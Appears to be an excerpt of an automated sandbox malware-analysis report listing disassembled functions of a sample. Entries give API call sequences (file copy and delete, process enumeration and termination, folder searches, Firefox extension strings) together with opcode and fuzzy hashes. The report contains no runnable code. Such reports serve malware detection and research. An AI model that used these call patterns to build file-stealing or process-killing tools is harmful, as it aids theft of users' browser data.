                                                                                  • Instruction Fuzzy Hash: 96E08CB8A80208BFC710DBD4EC0AE697BB8EB05702F000194FE0A87280DA719E008B96
                                                                                  Function 0040A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                    • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,008D4F10,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A2E1
                                                                                  • lstrlenA.KERNEL32(00000000,00000000), ref: 0040A3FF
                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040A6BC
                                                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                    • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 0040A743
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                                                                  • String ID:
                                                                                  • API String ID: 257331557-0
                                                                                  • Opcode ID: d20ad723e4956a4f5593e547689fc6f06bc1426b2961df15eb96e4f5265ec8e9
                                                                                  • Instruction ID: ddd88d02e0d3355bf8470c19a8c4de6788c323a7c51f3fd4630425147b47cfd6
                                                                                  • Opcode Fuzzy Hash: d20ad723e4956a4f5593e547689fc6f06bc1426b2961df15eb96e4f5265ec8e9
                                                                                  • Instruction Fuzzy Hash: 85E134728111089ACB04FBA5DD91EEE733CAF14314F50815EF51672091EF386A9ECB7A
                                                                                  Function 00B0A4C7 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00B1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B1A9EF
                                                                                    • Part of subcall function 00B1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B1AC2C
                                                                                    • Part of subcall function 00B1AC17: lstrcpy.KERNEL32(00000000), ref: 00B1AC6B
                                                                                    • Part of subcall function 00B1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AC79
                                                                                    • Part of subcall function 00B1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B1AB6C
                                                                                    • Part of subcall function 00B18DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00B01660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 00B18DED
                                                                                    • Part of subcall function 00B1AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B1ABD9
                                                                                    • Part of subcall function 00B1AB87: lstrcat.KERNEL32(00000000), ref: 00B1ABE9
                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00B0A548
                                                                                  • lstrlen.KERNEL32(00000000,00000000), ref: 00B0A666
                                                                                  • lstrlen.KERNEL32(00000000), ref: 00B0A923
                                                                                    • Part of subcall function 00B1AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B1AA4D
                                                                                    • Part of subcall function 00B0A077: memcmp.MSVCRT(?,00421264,00000003), ref: 00B0A094
                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 00B0A9AA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                                                                  • String ID:
                                                                                  • API String ID: 257331557-0
                                                                                  • Opcode ID: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                                                                                  • Instruction ID: 7799c5aca0d79057b331884402958aebb2758cb9bc97c4e34c29c50ff5db48f9
                                                                                  • Opcode Fuzzy Hash: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                                                                                  • Instruction Fuzzy Hash: 7EE1F3729112189BCB09FBA4DD92DEEB779AF14700F908199F11672091EF347B88CF62
                                                                                  Function 0040D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                    • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,008D4F10,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D481
                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040D698
                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040D6AC
                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 0040D72B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                  • String ID:
                                                                                  • API String ID: 211194620-0
                                                                                  • Opcode ID: 51504f8183e0b2e6ebec12441f0f26ba584a9b89164c583ff874fdf13874234a
                                                                                  • Instruction ID: 265a03a5026cdf5fd4b8160f1a7263b5072f0f83edca8c83d8fca220a3e7f1c0
                                                                                  • Opcode Fuzzy Hash: 51504f8183e0b2e6ebec12441f0f26ba584a9b89164c583ff874fdf13874234a
                                                                                  • Instruction Fuzzy Hash: 8A9145719111089BCB04FBA1DD92EEE7339AF14318F50452EF50772091EF386A9ACB7A
                                                                                  Function 00B0D667 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00B1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B1A9EF
                                                                                    • Part of subcall function 00B1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B1AC2C
                                                                                    • Part of subcall function 00B1AC17: lstrcpy.KERNEL32(00000000), ref: 00B1AC6B
                                                                                    • Part of subcall function 00B1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AC79
                                                                                    • Part of subcall function 00B1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B1AB6C
                                                                                    • Part of subcall function 00B18DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00B01660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 00B18DED
                                                                                    • Part of subcall function 00B1AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B1ABD9
                                                                                    • Part of subcall function 00B1AB87: lstrcat.KERNEL32(00000000), ref: 00B1ABE9
                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00B0D6E8
                                                                                  • lstrlen.KERNEL32(00000000), ref: 00B0D8FF
                                                                                  • lstrlen.KERNEL32(00000000), ref: 00B0D913
                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 00B0D992
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                  • String ID:
                                                                                  • API String ID: 211194620-0
                                                                                  • Opcode ID: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                                                                                  • Instruction ID: 0ffce31078420dd1d32a7f7a32ccc86cbd37952896ecfb49572aa9625ba36c53
                                                                                  • Opcode Fuzzy Hash: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                                                                                  • Instruction Fuzzy Hash: C591FF729112089BCB18FBA4DD96DEE77B9AF54700F9041A9F10672091EF347B88CF62
                                                                                  Function 0040D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                    • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,008D4F10,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D801
                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040D99F
                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040D9B3
                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 0040DA32
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                  • String ID:
                                                                                  • API String ID: 211194620-0
                                                                                  • Opcode ID: 370323d9a074025678898ae999b6463eb423e9135e59877d35bb5260e336077f
                                                                                  • Instruction ID: 30f7704c13366a17925c5eaa4a94e79927efa66a8a92483c7baa761e0d0dbf9b
                                                                                  • Opcode Fuzzy Hash: 370323d9a074025678898ae999b6463eb423e9135e59877d35bb5260e336077f
                                                                                  • Instruction Fuzzy Hash: 848122719111089BCB04FBE1DD52EEE7339AF14314F50452EF407A6091EF386A9ACB7A
                                                                                  Function 00B0D9E7 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00B1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B1A9EF
                                                                                    • Part of subcall function 00B1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B1AC2C
                                                                                    • Part of subcall function 00B1AC17: lstrcpy.KERNEL32(00000000), ref: 00B1AC6B
                                                                                    • Part of subcall function 00B1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AC79
                                                                                    • Part of subcall function 00B1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B1AB6C
                                                                                    • Part of subcall function 00B18DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00B01660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 00B18DED
                                                                                    • Part of subcall function 00B1AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B1ABD9
                                                                                    • Part of subcall function 00B1AB87: lstrcat.KERNEL32(00000000), ref: 00B1ABE9
                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00B0DA68
                                                                                  • lstrlen.KERNEL32(00000000), ref: 00B0DC06
                                                                                  • lstrlen.KERNEL32(00000000), ref: 00B0DC1A
                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 00B0DC99
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                  • String ID:
                                                                                  • API String ID: 211194620-0
                                                                                  • Opcode ID: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                                                                                  • Instruction ID: d1ae937bcbd25f36d592e033057c8e0396224b2fc52fd7edec31e9d597eb91eb
                                                                                  • Opcode Fuzzy Hash: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                                                                                  • Instruction Fuzzy Hash: 8481F3719112189BCB08FBE4DD96DEE77B9AF54700F9045ADF006A6091EF347B88CB62
                                                                                  Function 0040F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                    • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                                                    • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                                                    • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                                                    • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                                                    • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                                                    • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                                                    • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                  • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00421580,00420D92), ref: 0040F54C
                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040F56B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                                                                  • String ID: ^userContextId=4294967295$moz-extension+++
                                                                                  • API String ID: 998311485-3310892237
                                                                                  • Opcode ID: c6d68fb0603da1e25a23b90469779a044771ff029b5026b29d5fc07adc8ee29f
                                                                                  • Instruction ID: 431312e06e4e118a9a68feb07ac8eaa96768a2afdec7ba1937323e72019175af
                                                                                  • Opcode Fuzzy Hash: c6d68fb0603da1e25a23b90469779a044771ff029b5026b29d5fc07adc8ee29f
                                                                                  • Instruction Fuzzy Hash: 19516575D11108AACB04FBB1DC52DED7338AF54314F40852EF81667191EE386B9ACBAA
                                                                                  Function 004194D0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 004194EB
                                                                                    • Part of subcall function 00418D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                                                                                    • Part of subcall function 00418D50: HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                                                                                    • Part of subcall function 00418D50: wsprintfW.USER32 ref: 00418D78
                                                                                  • OpenProcess.KERNEL32(00001001,00000000,?), ref: 004195AB
                                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 004195C9
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004195D6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
                                                                                  • String ID:
                                                                                  • API String ID: 396451647-0
                                                                                  • Opcode ID: 10821a0a9b0e3e9f18d0c0a89dc9fb30756029c80415081bc58457899473f0be
                                                                                  • Instruction ID: faa3cbc47edc6d62fcde4c42a86d6f60d7c6cb9d9231cedff5acf80003c00c5b
                                                                                  • Opcode Fuzzy Hash: 10821a0a9b0e3e9f18d0c0a89dc9fb30756029c80415081bc58457899473f0be
                                                                                  • Instruction Fuzzy Hash: E3315C75E4020CAFDB14DFD0CD49BEDB7B9EB44300F10441AE506AA284DB78AE89CB56
                                                                                  Function 00B19737 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 00B19752
                                                                                    • Part of subcall function 00B18FB7: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00B19785,00000000), ref: 00B18FC2
                                                                                    • Part of subcall function 00B18FB7: RtlAllocateHeap.NTDLL(00000000), ref: 00B18FC9
                                                                                    • Part of subcall function 00B18FB7: wsprintfW.USER32 ref: 00B18FDF
                                                                                  • OpenProcess.KERNEL32(00001001,00000000,?), ref: 00B19812
                                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00B19830
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00B1983D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                                                                  • String ID:
                                                                                  • API String ID: 3729781310-0
                                                                                  • Opcode ID: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
                                                                                  • Instruction ID: 2281eb7fb161ad504f4ea1e5fd4eca0d9b77fb03649c98ca8d05367887d27e38
                                                                                  • Opcode Fuzzy Hash: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
                                                                                  • Instruction Fuzzy Hash: 943157B5E00248EFDB14DFE0CC49BEDB7B9EF49300F504498E506AB584DB74AA84CB52
                                                                                  Function 00418680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 004186CA
                                                                                  • Process32First.KERNEL32(?,00000128), ref: 004186DE
                                                                                  • Process32Next.KERNEL32(?,00000128), ref: 004186F3
                                                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                  • CloseHandle.KERNEL32(?), ref: 00418761
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 1066202413-0
                                                                                  • Opcode ID: 653c6250bfa2d25ce81b68ad29b9700611fbfcd40e1672ae0763ab040719d4ec
                                                                                  • Instruction ID: 8f5abf7c5654a811b9b3f094c7d3948ba22bca0c3321aba4e2188e2e86b1b5ea
                                                                                  • Opcode Fuzzy Hash: 653c6250bfa2d25ce81b68ad29b9700611fbfcd40e1672ae0763ab040719d4ec
                                                                                  • Instruction Fuzzy Hash: F7315E71902218ABCB24EF95DC45FEEB778EF45714F10419EF10AA21A0DF386A85CFA5
                                                                                  Function 00B188E7 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00B1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B1A9EF
                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 00B18931
                                                                                  • Process32First.KERNEL32(?,00000128), ref: 00B18945
                                                                                  • Process32Next.KERNEL32(?,00000128), ref: 00B1895A
                                                                                    • Part of subcall function 00B1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B1AC2C
                                                                                    • Part of subcall function 00B1AC17: lstrcpy.KERNEL32(00000000), ref: 00B1AC6B
                                                                                    • Part of subcall function 00B1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AC79
                                                                                    • Part of subcall function 00B1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B1AB6C
                                                                                  • CloseHandle.KERNEL32(?), ref: 00B189C8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 1066202413-0
                                                                                  • Opcode ID: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                                                                                  • Instruction ID: 238bb5472b5b6e899d8958bed64170bddadf005cd937aaa549b42a350a3f3c3b
                                                                                  • Opcode Fuzzy Hash: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                                                                                  • Instruction Fuzzy Hash: 13313C71952218EBCB24DF94DD85FEEB7B8EF45700F5041D9A10AA21A0EB346E84CF92
                                                                                  Function 00414F40 Relevance: 6.1, APIs: 4, Instructions: 70stringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                                                  • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414F7A
                                                                                  • lstrcatA.KERNEL32(?,00421070), ref: 00414F97
                                                                                  • lstrcatA.KERNEL32(?,009061A0), ref: 00414FAB
                                                                                  • lstrcatA.KERNEL32(?,00421074), ref: 00414FBD
                                                                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                                                                    • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                                                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                                                                    • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
